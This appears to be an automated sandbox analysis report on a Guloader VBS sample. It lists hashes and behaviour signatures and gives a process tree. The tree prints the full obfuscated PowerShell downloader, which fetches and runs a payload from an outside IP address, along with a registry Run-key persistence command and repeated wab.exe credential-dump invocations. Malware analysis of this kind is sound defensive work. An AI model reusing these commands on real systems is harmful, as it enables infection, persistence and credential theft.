Analysis

  • max time kernel
    0s
  • max time network
    148s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    09-06-2024 03:37

General

  • Target

    SKGHM_PE_757583588358839538539599593BeoersKnucklehead.vbs

  • Size

    154KB

  • MD5

    8993abe6fdbed5a58e5f8806cb1a12d8

  • SHA1

    6f52e232be6a55b0411d2d2bf1e03b01b7388921

  • SHA256

    1d6d36ec589cbecea839e3b4a5156a35f48436847043f2e1f307f6579e7893e2

  • SHA512

    9de0b6554063778d0fec454f0fcb72acc5a1b652aff0f4513254097b6cfdce80c496e330ba93c2bacbabc5437fa508a124eb5e099c0e92dca2d7b70975090bd3

  • SSDEEP

    3072:Gvn9Dm5IXdH7eAlsSyP/ioJbae+nzu6J5RcuXrMLyVZH4lY0Gx2gDwDjNMrt:Gvn9Dm5IXdH7ecsSyP/io9ae+nzu6J5j

Score
10/10

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 30 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\SKGHM_PE_757583588358839538539599593BeoersKnucklehead.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4996
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Spectroscopists120 = 1;Function Statsraads($Cablegram){$Broderfolket=$Cablegram.Length-$Spectroscopists120;$Boombox='Substring';For( $Udryddendes=5;$Udryddendes -lt $Broderfolket;$Udryddendes+=6){$Semimembranosus+=$Cablegram.$Boombox.Invoke( $Udryddendes, $Spectroscopists120);}$Semimembranosus;}function Saddirham($Assika){ & ($rapaciously) ($Assika);}$Stteriets=Statsraads 'L tulMPragmo etydzSlrini RoqulForgrl Sym aFlytn/Virge5Reins. Ca s0Skovl S ol(F.sfoW ommiF enunEtagedzymuroBigutwPathosInd,r GoumiN,dateT unp. Feltp1Troll0Nd.ed. Syko0Drunk;Baner RhataWBrea,iJaspenDorlo6Unref4 S at;,adka I,dkrxAuc,t6Guldf4Re,it;,adde Over.r ,andvc.sse:Ro le1Unsym2Hydri1Fear,.Snooz0Abstr)Straf PardsGPro,uefo urcBle,sk.ffixo Rei./Klfte2,lyng0 Un,o1tunin0ramle0 Ch.k1Ddsdm0 Meda1Ex er plejeFMortiiFokker,hetreMyc,sfShephoAmadexKmela/ Outh1F lsk2Nippo1Forp...rodu0 ortu ';$preverbal=Statsraads ' SquiUanfrasprogre Endsr Div,-Femd.AOss,tgVaredehecton T.ymtBrand ';$Gardehusarer=Statsraads ' P.eshUnroutlintst Surbp B.dr:Rosc,/,itha/ N tn1Uddel9 Elek4ar ej.Fanta5Acide9Elabo.vands3 Syst1.azin. Data1syn.t8P leg7conve/EnaktTPulayi ParalRadiosGr tikAfskurIntere ForpnHaverdTangfeGtcwisBeads.BifigtDevitoProboc,lfen ';$Auras=Statsraads ',igna>Prost ';$rapaciously=Statsraads 'Jadesi OrgeeLeninxCyke. ';$Beskylles='Patrichs';$stereography = Statsraads 'ponceeKerencJus.ih ,revo Wi.i Hjrej%Uh.giaFetispPhosppBnfstd UdspaTribut Downa Clea%Radi.\VengiBgscocaLavtrs P.aksHyr,riMellisTilhut,upere tidsn .ihesSocia.W.ylaT PresiEdeltlUdskn Knife&Konta&Quaif Fee,eVgtencSnigmhMudguo.rygt Limfat Olaj ';Saddirham (Statsraads ' Ur.n$Sk legPriorlIn lao.oladb,appoaMe,vilExcre:Afgr SAksl.lCreataStrewdKon,rrFlesteBackrt WaleaAccins,melikImpeeePala n.kattsNonfe=Hatte(Pueric MellmSprydd Thor Flueg/ r.edcNilda K.ttl$DuettsBeetlt Ou.tecan orCurb eTotaloGuglig direr MolaaSpeedpJalouh C.mpyNe,sp)Ka.it ');Saddirham (Statsraads ' Slag$Rn.gegRemedlBetryoDioctb LollaForevlverni:Pe,iogunlimeFondlvOddneiNo,dirAnd.rsFangl=Lobhu$ IslnGAnt,saZircor TubadMyndietilfrh,ractuD,nsesNonnuaCopyhr Hippe Wea rMaale.ProtosTaknipBondelBed.iiUddantSubso(Birr.$ Dem,AMultiuUrisir AfhjainkvisInlan)Undes ');$Gardehusarer=$gevirs[0];$kontorautomatiseringer= (Statsraads 'Genne$.usmdgDag jlDredgoBumblb SubkaHyperlporen:unpurFBrorso sjlerab.trt fstrhSuperySutte=CaracNPlasmeCircuw N.np-HistoOSemafbChannjBejume tandcMangetT,esa EfeueS.lrumyNemessSeriot WaveeTurbomEnk.l. jumiNI.done Kurdt Digt.LumskW tauteBorgeb FyldCGuerdlSen,ei BeabeAfgifn,osnit');$kontorautomatiseringer+=$Sladretaskens[1];Saddirham ($kontorautomatiseringer);Saddirham (Statsraads 'Udspi$ BrndFOutdaoGammer.ntertSquethVindbyBeadw. affiH,edsaeRustiaUnderdMorgeeWaterr TotasSvejf[Indes$MicropM.trerBigg ePointvPrstee OverrBechabDesi,aInterl Hyld] dest=Bicor$ rsenSTennitg.amotSdelieSprigr.olypiF.ambeP.eretDzublsReali ');$Musikledsagelses=Statsraads ' .oit$ UdlsFSe veoropemr RedatSyrerhElendyovers.PapooDElit.oH.lvewFrgemnKarkllcountoTrik.a Mercd.askoFkirkeiFractl Forhe,ndep(U,set$ AreoG,anawaSharprUnderdAutogebletthMilesu ddyksKrakkaRituarKludge,atrir Capi,Rygea$AgronSDumrikUpwaraCy,herServev.krtoerecivrOverv)Dimin ';$Skarver=$Sladretaskens[0];Saddirham (Statsraads 'F,ste$C hobgNota.lNedtaoSkolebUltaoaBlekilNeda,:LibelFJ,leliT.mbefStaalfLogeriDobbegIretttHyper=Grimf(FitzcTHjmeseLyskusVirgitDuode-,rigiPDuskea .ilttSbladhGedeh Brled$BirreS ustiktartaaExtrarPapbavKnivseDisesrN.tri)Angel ');while (!$Fiffigt) {Saddirham (Statsraads 'Proto$Im ergTilsalSkuffoFalcob Stada BroflSi el:ArvetDSe.enrDownca liqpAkt.oaPo,tcrAvissn orguaAvenallssald Sa miMi jsa Fors=condu$M nimtEks rr ConsuragnseInit ') ;Saddirham $Musikledsagelses;Saddirham (Statsraads 'ForesSDe ivtMaenaaGejlerPer,lt Offi- NudaSMinislUnwifeStrane S.lrpsuper G.ade4Sko,n ');Saddirham (Statsraads 'Stoma$InfangVolu lTurbooSubstbNoninaAmun.lS,iri:MesmeFVer.ciT,ynef M,kifOverhisk.ivgOpsprtPicks=Rec.i(Bad.aTGullieLivvis Simut.urse-QuincP ,omsadepr,tSaarhhAlkoh Kon $An,acSHumorkSkrddaTidsbrBlistvKantaePlakerSulp.)Herme ') ;Saddirham (Statsraads 'Nedgr$ NeurgUnsailMag.ao NathbBlu.da Sl slpostg:ModesU NearpUnselcSten o Folkl Cri,uReskrmQuiltnClima= ,nde$ CompgbatlilSkruboC.vatb offia Gnuelp.ilo:Mer eFGrubslHeredaFi urtFertitBlddee heptr MesteAbiolrRounds.andp+Eloig+Solri%Reine$Sl,ergB,ryteEmbo vRaa.aiMisjur F ovsAfdel.T mblc LyrioFleksuArbejnSttemtHalvp ') ;$Gardehusarer=$gevirs[$Upcolumn];}$Skvatte=334511;$mellemleddets=27712;Saddirham (Statsraads 'Erteb$ddsaag UnvelAfsteoSagumbAnalca.ttral,ydro:Ya miFDat doIsenkrNougafT,phelBearbg TrapeCharnlOpbygsDugaleUdenrrOmni.sWobbl Likvi=Aktio MarkdGVedl eatombtBelur-EmetaCCicisoOrnitn.ordst GheteStmagnDebo.tFrden E,rus$,appoS,evrtkUdt,kaMagnerValvev InsceG.rlirMarin ');Saddirham (Statsraads ' sk.b$ Ca mgLednilHolosoVas bbRetaraChi.al Cha,: TappM,eaveiOdyssn InfaiE,logaOrgantScr,euaugusrMag.eiPole.s sk.fa PanetBoendiN.foroSi.din Vrdi Alien=H,gge Kends[BredbSYngvaySheddsChiv,t Rimse Uds.m port.ForsiCT,ckloMethon ArchvAfhngeun,ovrBrochtC.ust]Fouri:Heter:AmphiFRadiarRingioTox,pmTveknB AfsnaHandisE,dekeHypon6Denta4PrsteS,onottUnprerR,gidiSheltnhypatg Dion( Myom$IndhoFSavn.oBekkar BeatfToughlco,esg LifteSaml l,rizzs Per,e KlosrPythos Brug)Annih ');Saddirham (Statsraads 'Strkl$Tol fg.avanlSampio RepobSponsaSeptal Diac:BibliOOptrkp FilmlAut,ha,oldenPterydCom.lsOutguaHeavevgrundiM raksWastee pensrNewsmnNit.oe Hemo Mosq=Skift .ushg[SubriSFokusySpol.sRets tKa,aneGallum oeti. MarkTAdapteSyn,hxNondetBushb.ErkynE SkvanledincSlvmeo Ndded RektiSlvp,n StregMonof]Pocke:.ounc:TintiA ,ensSRdbedCT rfaIPluskIPedic. DaemGMarreeCiboltUlykkSHeathtAutorrSatiriFurlanC untg Brun(Disun$PrivaM Linei P,linDu,deiSlgtsaUn.aitDaydruUndolrUdhveiMa ros S.ela ToiltAfsvkiTumuloOmbu.nprsid),ntoo ');Saddirham (Statsraads 'Timed$U,idigOffwal AarmoGroucbBaaseaYn.eslOpini:bombaDGodseeRulammE,evaiFluxemGadekeUdtrktDialyoHamatpAposteunchi=Kraki$ParafOVodbipApelilA roya Nu unPattedBro,zsSubsta.opolvSalemi Te,rsPebreeMlkerr concnUdv,seGrund.GarrysSlagsuNaimab St.vsPresst NonarTenseiEmporn belagAlter(A ast$UnemaSKu.stkH,kkev S,roa ProgtOppeit Misbestorl,lofte$fab fmLydbie Rem lSer,tlK.amteO ergmDi,sclNonore SnusdD mphd LegeeFug,itTrldosHeddi)Gr ek ');Saddirham $Demimetope;"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:232
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Bassistens.Til && echo t"
        3⤵
          PID:1536
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Spectroscopists120 = 1;Function Statsraads($Cablegram){$Broderfolket=$Cablegram.Length-$Spectroscopists120;$Boombox='Substring';For( $Udryddendes=5;$Udryddendes -lt $Broderfolket;$Udryddendes+=6){$Semimembranosus+=$Cablegram.$Boombox.Invoke( $Udryddendes, $Spectroscopists120);}$Semimembranosus;}function Saddirham($Assika){ & ($rapaciously) ($Assika);}$Stteriets=Statsraads 'L tulMPragmo etydzSlrini RoqulForgrl Sym aFlytn/Virge5Reins. Ca s0Skovl S ol(F.sfoW ommiF enunEtagedzymuroBigutwPathosInd,r GoumiN,dateT unp. Feltp1Troll0Nd.ed. Syko0Drunk;Baner RhataWBrea,iJaspenDorlo6Unref4 S at;,adka I,dkrxAuc,t6Guldf4Re,it;,adde Over.r ,andvc.sse:Ro le1Unsym2Hydri1Fear,.Snooz0Abstr)Straf PardsGPro,uefo urcBle,sk.ffixo Rei./Klfte2,lyng0 Un,o1tunin0ramle0 Ch.k1Ddsdm0 Meda1Ex er plejeFMortiiFokker,hetreMyc,sfShephoAmadexKmela/ Outh1F lsk2Nippo1Forp...rodu0 ortu ';$preverbal=Statsraads ' SquiUanfrasprogre Endsr Div,-Femd.AOss,tgVaredehecton T.ymtBrand ';$Gardehusarer=Statsraads ' P.eshUnroutlintst Surbp B.dr:Rosc,/,itha/ N tn1Uddel9 Elek4ar ej.Fanta5Acide9Elabo.vands3 Syst1.azin. Data1syn.t8P leg7conve/EnaktTPulayi ParalRadiosGr tikAfskurIntere ForpnHaverdTangfeGtcwisBeads.BifigtDevitoProboc,lfen ';$Auras=Statsraads ',igna>Prost ';$rapaciously=Statsraads 'Jadesi OrgeeLeninxCyke. ';$Beskylles='Patrichs';$stereography = Statsraads 'ponceeKerencJus.ih ,revo Wi.i Hjrej%Uh.giaFetispPhosppBnfstd UdspaTribut Downa Clea%Radi.\VengiBgscocaLavtrs P.aksHyr,riMellisTilhut,upere tidsn .ihesSocia.W.ylaT PresiEdeltlUdskn Knife&Konta&Quaif Fee,eVgtencSnigmhMudguo.rygt Limfat Olaj ';Saddirham (Statsraads ' Ur.n$Sk legPriorlIn lao.oladb,appoaMe,vilExcre:Afgr SAksl.lCreataStrewdKon,rrFlesteBackrt WaleaAccins,melikImpeeePala n.kattsNonfe=Hatte(Pueric MellmSprydd Thor Flueg/ r.edcNilda K.ttl$DuettsBeetlt Ou.tecan orCurb eTotaloGuglig direr MolaaSpeedpJalouh C.mpyNe,sp)Ka.it ');Saddirham (Statsraads ' Slag$Rn.gegRemedlBetryoDioctb LollaForevlverni:Pe,iogunlimeFondlvOddneiNo,dirAnd.rsFangl=Lobhu$ IslnGAnt,saZircor TubadMyndietilfrh,ractuD,nsesNonnuaCopyhr Hippe Wea rMaale.ProtosTaknipBondelBed.iiUddantSubso(Birr.$ Dem,AMultiuUrisir AfhjainkvisInlan)Undes ');$Gardehusarer=$gevirs[0];$kontorautomatiseringer= (Statsraads 'Genne$.usmdgDag jlDredgoBumblb SubkaHyperlporen:unpurFBrorso sjlerab.trt fstrhSuperySutte=CaracNPlasmeCircuw N.np-HistoOSemafbChannjBejume tandcMangetT,esa EfeueS.lrumyNemessSeriot WaveeTurbomEnk.l. jumiNI.done Kurdt Digt.LumskW tauteBorgeb FyldCGuerdlSen,ei BeabeAfgifn,osnit');$kontorautomatiseringer+=$Sladretaskens[1];Saddirham ($kontorautomatiseringer);Saddirham (Statsraads 'Udspi$ BrndFOutdaoGammer.ntertSquethVindbyBeadw. affiH,edsaeRustiaUnderdMorgeeWaterr TotasSvejf[Indes$MicropM.trerBigg ePointvPrstee OverrBechabDesi,aInterl Hyld] dest=Bicor$ rsenSTennitg.amotSdelieSprigr.olypiF.ambeP.eretDzublsReali ');$Musikledsagelses=Statsraads ' .oit$ UdlsFSe veoropemr RedatSyrerhElendyovers.PapooDElit.oH.lvewFrgemnKarkllcountoTrik.a Mercd.askoFkirkeiFractl Forhe,ndep(U,set$ AreoG,anawaSharprUnderdAutogebletthMilesu ddyksKrakkaRituarKludge,atrir Capi,Rygea$AgronSDumrikUpwaraCy,herServev.krtoerecivrOverv)Dimin ';$Skarver=$Sladretaskens[0];Saddirham (Statsraads 'F,ste$C hobgNota.lNedtaoSkolebUltaoaBlekilNeda,:LibelFJ,leliT.mbefStaalfLogeriDobbegIretttHyper=Grimf(FitzcTHjmeseLyskusVirgitDuode-,rigiPDuskea .ilttSbladhGedeh Brled$BirreS ustiktartaaExtrarPapbavKnivseDisesrN.tri)Angel ');while (!$Fiffigt) {Saddirham (Statsraads 'Proto$Im ergTilsalSkuffoFalcob Stada BroflSi el:ArvetDSe.enrDownca liqpAkt.oaPo,tcrAvissn orguaAvenallssald Sa miMi jsa Fors=condu$M nimtEks rr ConsuragnseInit ') ;Saddirham $Musikledsagelses;Saddirham (Statsraads 'ForesSDe ivtMaenaaGejlerPer,lt Offi- NudaSMinislUnwifeStrane S.lrpsuper G.ade4Sko,n ');Saddirham (Statsraads 'Stoma$InfangVolu lTurbooSubstbNoninaAmun.lS,iri:MesmeFVer.ciT,ynef M,kifOverhisk.ivgOpsprtPicks=Rec.i(Bad.aTGullieLivvis Simut.urse-QuincP ,omsadepr,tSaarhhAlkoh Kon $An,acSHumorkSkrddaTidsbrBlistvKantaePlakerSulp.)Herme ') ;Saddirham (Statsraads 'Nedgr$ NeurgUnsailMag.ao NathbBlu.da Sl slpostg:ModesU NearpUnselcSten o Folkl Cri,uReskrmQuiltnClima= ,nde$ CompgbatlilSkruboC.vatb offia Gnuelp.ilo:Mer eFGrubslHeredaFi urtFertitBlddee heptr MesteAbiolrRounds.andp+Eloig+Solri%Reine$Sl,ergB,ryteEmbo vRaa.aiMisjur F ovsAfdel.T mblc LyrioFleksuArbejnSttemtHalvp ') ;$Gardehusarer=$gevirs[$Upcolumn];}$Skvatte=334511;$mellemleddets=27712;Saddirham (Statsraads 'Erteb$ddsaag UnvelAfsteoSagumbAnalca.ttral,ydro:Ya miFDat doIsenkrNougafT,phelBearbg TrapeCharnlOpbygsDugaleUdenrrOmni.sWobbl Likvi=Aktio MarkdGVedl eatombtBelur-EmetaCCicisoOrnitn.ordst GheteStmagnDebo.tFrden E,rus$,appoS,evrtkUdt,kaMagnerValvev InsceG.rlirMarin ');Saddirham (Statsraads ' sk.b$ Ca mgLednilHolosoVas bbRetaraChi.al Cha,: TappM,eaveiOdyssn InfaiE,logaOrgantScr,euaugusrMag.eiPole.s sk.fa PanetBoendiN.foroSi.din Vrdi Alien=H,gge Kends[BredbSYngvaySheddsChiv,t Rimse Uds.m port.ForsiCT,ckloMethon ArchvAfhngeun,ovrBrochtC.ust]Fouri:Heter:AmphiFRadiarRingioTox,pmTveknB AfsnaHandisE,dekeHypon6Denta4PrsteS,onottUnprerR,gidiSheltnhypatg Dion( Myom$IndhoFSavn.oBekkar BeatfToughlco,esg LifteSaml l,rizzs Per,e KlosrPythos Brug)Annih ');Saddirham (Statsraads 'Strkl$Tol fg.avanlSampio RepobSponsaSeptal Diac:BibliOOptrkp FilmlAut,ha,oldenPterydCom.lsOutguaHeavevgrundiM raksWastee pensrNewsmnNit.oe Hemo Mosq=Skift .ushg[SubriSFokusySpol.sRets tKa,aneGallum oeti. MarkTAdapteSyn,hxNondetBushb.ErkynE SkvanledincSlvmeo Ndded RektiSlvp,n StregMonof]Pocke:.ounc:TintiA ,ensSRdbedCT rfaIPluskIPedic. DaemGMarreeCiboltUlykkSHeathtAutorrSatiriFurlanC untg Brun(Disun$PrivaM Linei P,linDu,deiSlgtsaUn.aitDaydruUndolrUdhveiMa ros S.ela ToiltAfsvkiTumuloOmbu.nprsid),ntoo ');Saddirham (Statsraads 'Timed$U,idigOffwal AarmoGroucbBaaseaYn.eslOpini:bombaDGodseeRulammE,evaiFluxemGadekeUdtrktDialyoHamatpAposteunchi=Kraki$ParafOVodbipApelilA roya Nu unPattedBro,zsSubsta.opolvSalemi Te,rsPebreeMlkerr concnUdv,seGrund.GarrysSlagsuNaimab St.vsPresst NonarTenseiEmporn belagAlter(A ast$UnemaSKu.stkH,kkev S,roa ProgtOppeit Misbestorl,lofte$fab fmLydbie Rem lSer,tlK.amteO ergmDi,sclNonore SnusdD mphd LegeeFug,itTrldosHeddi)Gr ek ');Saddirham $Demimetope;"
          3⤵
            PID:1320
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Bassistens.Til && echo t"
              4⤵
                PID:2024
              • C:\Program Files (x86)\windows mail\wab.exe
                "C:\Program Files (x86)\windows mail\wab.exe"
                4⤵
                  PID:2764
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Kuldsejledes" /t REG_EXPAND_SZ /d "%Fermenteringerne% -w 1 $Objurgations=(Get-ItemProperty -Path 'HKCU:\Come\').Chilliwack;%Fermenteringerne% ($Objurgations)"
                    5⤵
                      PID:3736
                      • C:\Windows\SysWOW64\reg.exe
                        REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Kuldsejledes" /t REG_EXPAND_SZ /d "%Fermenteringerne% -w 1 $Objurgations=(Get-ItemProperty -Path 'HKCU:\Come\').Chilliwack;%Fermenteringerne% ($Objurgations)"
                        6⤵
                        • Modifies registry key
                        PID:4692
                    • C:\Program Files (x86)\windows mail\wab.exe
                      "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\mikefsxbshupisduoujxrmwpsgv"
                      5⤵
                        PID:4312
                      • C:\Program Files (x86)\windows mail\wab.exe
                        "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\mikefsxbshupisduoujxrmwpsgv"
                        5⤵
                          PID:4440
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 4440 -s 12
                            6⤵
                            • Program crash
                            PID:1928
                        • C:\Program Files (x86)\windows mail\wab.exe
                          "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\xcpxglidgpmukyzgxewycyrgamnyhlh"
                          5⤵
                            PID:4304
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 4304 -s 12
                              6⤵
                              • Program crash
                              PID:5096
                          • C:\Program Files (x86)\windows mail\wab.exe
                            "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\zwvihdtwuxezumnkopiafllpjbwhawxyzg"
                            5⤵
                              PID:1396
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 1396 -s 12
                                6⤵
                                • Program crash
                                PID:1468
                            • C:\Program Files (x86)\windows mail\wab.exe
                              "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\eowsedykwcafjtouzejmfrsgvl"
                              5⤵
                                PID:3908
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3908 -s 12
                                  6⤵
                                  • Program crash
                                  PID:4080
                              • C:\Program Files (x86)\windows mail\wab.exe
                                "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\oibkfnjdsksktacyipwoieexerckv"
                                5⤵
                                  PID:4420
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4420 -s 12
                                    6⤵
                                    • Program crash
                                    PID:4364
                                • C:\Program Files (x86)\windows mail\wab.exe
                                  "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\rkpdfftfgskpvgyczaqptjzgmgulwjya"
                                  5⤵
                                    PID:5084
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 12
                                      6⤵
                                      • Program crash
                                      PID:656
                                  • C:\Program Files (x86)\windows mail\wab.exe
                                    "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\lrcucmoqtooihhvismxij"
                                    5⤵
                                      PID:4444
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4444 -s 12
                                        6⤵
                                        • Program crash
                                        PID:4548
                                    • C:\Program Files (x86)\windows mail\wab.exe
                                      "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\wtifdfykhxhnsvrukxrcuwfx"
                                      5⤵
                                        PID:452
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 452 -s 12
                                          6⤵
                                          • Program crash
                                          PID:3924
                                      • C:\Program Files (x86)\windows mail\wab.exe
                                        "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\gnvxdxjdvfzaubfythedxjsohezp"
                                        5⤵
                                          PID:3156
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 3156 -s 12
                                            6⤵
                                            • Program crash
                                            PID:1060
                                        • C:\Program Files (x86)\windows mail\wab.exe
                                          "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\bcjpawvpjbdtgcje"
                                          5⤵
                                            PID:4924
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4924 -s 12
                                              6⤵
                                              • Program crash
                                              PID:1916
                                          • C:\Program Files (x86)\windows mail\wab.exe
                                            "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\dwwhaogrfjvyqifidwf"
                                            5⤵
                                              PID:2064
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 2064 -s 12
                                                6⤵
                                                • Program crash
                                                PID:4896
                                            • C:\Program Files (x86)\windows mail\wab.exe
                                              "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\nzcsbhzksrndtwtmvhrracs"
                                              5⤵
                                                PID:4332
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4332 -s 12
                                                  6⤵
                                                  • Program crash
                                                  PID:472
                                              • C:\Program Files (x86)\windows mail\wab.exe
                                                "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\iopryflwgor"
                                                5⤵
                                                  PID:3120
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3120 -s 12
                                                    6⤵
                                                    • Program crash
                                                    PID:3384
                                                • C:\Program Files (x86)\windows mail\wab.exe
                                                  "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\sidcyywxuwjjpd"
                                                  5⤵
                                                    PID:1832
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1832 -s 12
                                                      6⤵
                                                      • Program crash
                                                      PID:2016
                                                  • C:\Program Files (x86)\windows mail\wab.exe
                                                    "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\vcivzqhrieborkiiop"
                                                    5⤵
                                                      PID:3128
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 3128 -s 12
                                                        6⤵
                                                        • Program crash
                                                        PID:2704
                                                    • C:\Program Files (x86)\windows mail\wab.exe
                                                      "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\ztjfwhmerj"
                                                      5⤵
                                                        PID:2904
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2904 -s 12
                                                          6⤵
                                                          • Program crash
                                                          PID:4384
                                                      • C:\Program Files (x86)\windows mail\wab.exe
                                                        "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\knppxawyfrqzq"
                                                        5⤵
                                                          PID:3872
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 3872 -s 12
                                                            6⤵
                                                            • Program crash
                                                            PID:3192
                                                        • C:\Program Files (x86)\windows mail\wab.exe
                                                          "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\mquiyshztziealla"
                                                          5⤵
                                                            PID:4928
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 12
                                                              6⤵
                                                              • Program crash
                                                              PID:1948
                                                          • C:\Program Files (x86)\windows mail\wab.exe
                                                            "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\hxqzu"
                                                            5⤵
                                                              PID:1624
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 1624 -s 12
                                                                6⤵
                                                                • Program crash
                                                                PID:4104
                                                            • C:\Program Files (x86)\windows mail\wab.exe
                                                              "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\rzvsvrme"
                                                              5⤵
                                                                PID:3616
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3616 -s 12
                                                                  6⤵
                                                                  • Program crash
                                                                  PID:4404
                                                              • C:\Program Files (x86)\windows mail\wab.exe
                                                                "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\btakvcxgjmw"
                                                                5⤵
                                                                  PID:4812
                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4812 -s 12
                                                                    6⤵
                                                                    • Program crash
                                                                    PID:1468
                                                                • C:\Program Files (x86)\windows mail\wab.exe
                                                                  "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\wiwcsjjreiaalhebutoctcdmlajjwpd"
                                                                  5⤵
                                                                    PID:2756
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2756 -s 12
                                                                      6⤵
                                                                      • Program crash
                                                                      PID:3716
                                                                  • C:\Program Files (x86)\windows mail\wab.exe
                                                                    "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\yccmtbulsqsnnosfmebewgydmoarpacrin"
                                                                    5⤵
                                                                      PID:624
                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 624 -s 12
                                                                        6⤵
                                                                        • Program crash
                                                                        PID:2924
                                                                    • C:\Program Files (x86)\windows mail\wab.exe
